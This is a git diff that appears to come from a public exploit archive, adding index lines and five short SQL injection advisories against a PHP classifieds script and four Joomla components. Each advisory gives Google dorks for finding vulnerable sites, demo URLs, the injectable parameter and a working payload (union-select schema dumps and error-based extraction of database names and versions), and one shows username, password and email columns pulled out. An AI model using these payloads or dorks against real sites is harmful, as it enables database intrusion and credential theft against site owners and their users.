diff --git a/files.csv b/files.csv index 4cde2ee9b..69e27d9b3 100644 --- a/files.csv +++ b/files.csv @@ -37396,6 +37396,7 @@ id,file,description,date,author,platform,type,port 41470,platforms/php/webapps/41470.txt,"Joomla! Component OneVote! 1.0 - SQL Injection",2017-02-27,"Ihsan Sencan",php,webapps,0 41472,platforms/hardware/webapps/41472.html,"NETGEAR DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery",2017-02-28,SivertPL,hardware,webapps,0 41478,platforms/hardware/webapps/41478.txt,"DLink DSL-2730U Wireless N 150 - Cross-Site Request Forgery",2017-03-01,"B GOVIND",hardware,webapps,0 +41492,platforms/php/webapps/41492.txt,"Php Classified OLX Clone Script - 'category' Parameter SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0 41482,platforms/xml/webapps/41482.txt,"Aruba AirWave 8.2.3 - XML External Entity Injection / Cross-Site Scripting",2017-03-01,"SEC Consult",xml,webapps,0 41483,platforms/php/webapps/41483.html,"WordPress Plugin Contact Form Manager - Cross-Site Request Forgery / Cross-Site Scripting",2017-03-01,"Edwin Molenaar",php,webapps,80 41484,platforms/php/webapps/41484.txt,"WordPress Plugin User Login Log 2.2.1 - Cross-Site Scripting",2017-03-01,"Axel Koolhaas",php,webapps,80 @@ -37406,3 +37407,7 @@ id,file,description,date,author,platform,type,port 41489,platforms/php/webapps/41489.txt,"SchoolDir - SQL Injection",2017-03-01,"Ihsan Sencan",php,webapps,0 41490,platforms/php/webapps/41490.txt,"Rage Faces Script 1.3 - SQL Injection",2017-03-01,"Ihsan Sencan",php,webapps,0 41491,platforms/php/webapps/41491.txt,"Meme Maker Script 2.1 - 'user' Parameter SQL Injection",2017-03-01,"Ihsan Sencan",php,webapps,0 +41493,platforms/php/webapps/41493.txt,"Joomla! Component Abstract 2.1 - SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0 +41494,platforms/php/webapps/41494.txt,"Joomla! Component StreetGuessr Game 1.0 - SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0 +41495,platforms/php/webapps/41495.txt,"Joomla! Component Guesser 1.0.4 - 'type' Parameter SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0 +41496,platforms/php/webapps/41496.txt,"Joomla! Component Recipe Manager 2.2 - 'id' Parameter SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0 diff --git a/platforms/php/webapps/41492.txt b/platforms/php/webapps/41492.txt new file mode 100755 index 000000000..59424eca8 --- /dev/null +++ b/platforms/php/webapps/41492.txt @@ -0,0 +1,23 @@ +# # # # # +# Exploit Title: Php Classified OLX Clone Script - SQL Injection +# Google Dork: N/A +# Date: 02.03.2017 +# Vendor Homepage: https://wptit.com/ +# Software: https://wptit.com/portfolio/php-classified-website-sale/ +# Demo: http://www.adsthem.com/ +# Version: N/A +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/search?search_key=IhsanSencan&category=[SQL] +# -30+/*!50000union*/+select+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))-- - +# Etc.... +# :username
  • atulya_moderators +# :password
  • atulya_moderators +# :fullname
  • atulya_moderators +# :email
  • atulya_moderators +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41493.txt b/platforms/php/webapps/41493.txt new file mode 100755 index 000000000..844d69c08 --- /dev/null +++ b/platforms/php/webapps/41493.txt @@ -0,0 +1,19 @@ +# # # # # +# Exploit Title: Joomla! Component Abstract v2.1 - SQL Injection +# Google Dork: inurl:index.php?option=com_abstract +# Date: 02.03.2017 +# Vendor Homepage: http://joomla6teen.com/ +# Software: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/abstract-manager/ +# Demo: http://demo.joomla6teen.com/abstractmanager +# Version: 2.1 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_abstract&view=conferences&layout=detail&pid=[SQL] +# http://localhost/[PATH]/index.php?option=com_abstract&view=conferences&task=contactEmail&pid=[SQL] +# 1+OR+1+GROUP+BY+CONCAT_WS(0x3a,0x496873616e53656e63616e,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1 +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41494.txt b/platforms/php/webapps/41494.txt new file mode 100755 index 000000000..119699f85 --- /dev/null +++ b/platforms/php/webapps/41494.txt @@ -0,0 +1,18 @@ +# # # # # +# Exploit Title: Joomla! Component StreetGuessr Game v1.0 - SQL Injection +# Google Dork: inurl:index.php?option=com_streetguess +# Date: 02.03.2017 +# Vendor Homepage: https://www.nordmograph.com/ +# Software: https://extensions.joomla.org/extensions/extension/sports-a-games/streetguessr-game/ +# Demo: https://www.streetguessr.com/ +# Version: 1.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_streetguess&view=leaderboard&id=[SQL] +# 7'+/*!50000Procedure*/+/*!50000Analyse*/+(/*!50000extractvalue*/(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,/*!50000@@version*/)),0)-- - +# # # # # diff --git a/platforms/php/webapps/41495.txt b/platforms/php/webapps/41495.txt new file mode 100755 index 000000000..11e9a7862 --- /dev/null +++ b/platforms/php/webapps/41495.txt @@ -0,0 +1,18 @@ +# # # # # +# Exploit Title: Joomla! Component Guesser v1.0.4 - SQL Injection +# Google Dork: inurl:index.php?option=com_guesser +# Date: 02.03.2017 +# Vendor Homepage: http://www.bitsgeo.com/ +# Software: https://extensions.joomla.org/extensions/extension/marketing/guesser/ +# Demo: http://www.bitsgeo.com/guesson/ +# Version: 1.0.4 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/guessers?type=[SQL] +# 'and(select+1+from+(select+count(*),concat((select(select+concat(cast(database()+as+char),0x3c3c3c,0x7e,0x496873616e2053656e63616e))+from information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables group+by+x)a)+AND+'Ihsan'='Sencan +# # # # # diff --git a/platforms/php/webapps/41496.txt b/platforms/php/webapps/41496.txt new file mode 100755 index 000000000..15ebf39ae --- /dev/null +++ b/platforms/php/webapps/41496.txt @@ -0,0 +1,19 @@ +# # # # # +# Exploit Title: Joomla! Component Recipe Manager v2.2 - SQL Injection +# Google Dork: inurl:index.php?option=com_recipe +# Date: 02.03.2017 +# Vendor Homepage: http://joomla6teen.com/ +# Software: https://extensions.joomla.org/extensions/extension/vertical-markets/thematic-directory/recipe-manager/ +# Demo: http://demo.joomla6teen.com/recipemanager/ +# Version: 2.2 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_recipe&view=recipes&task=print_ingred&id=[SQL] +# 10'+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- - +# # # # # +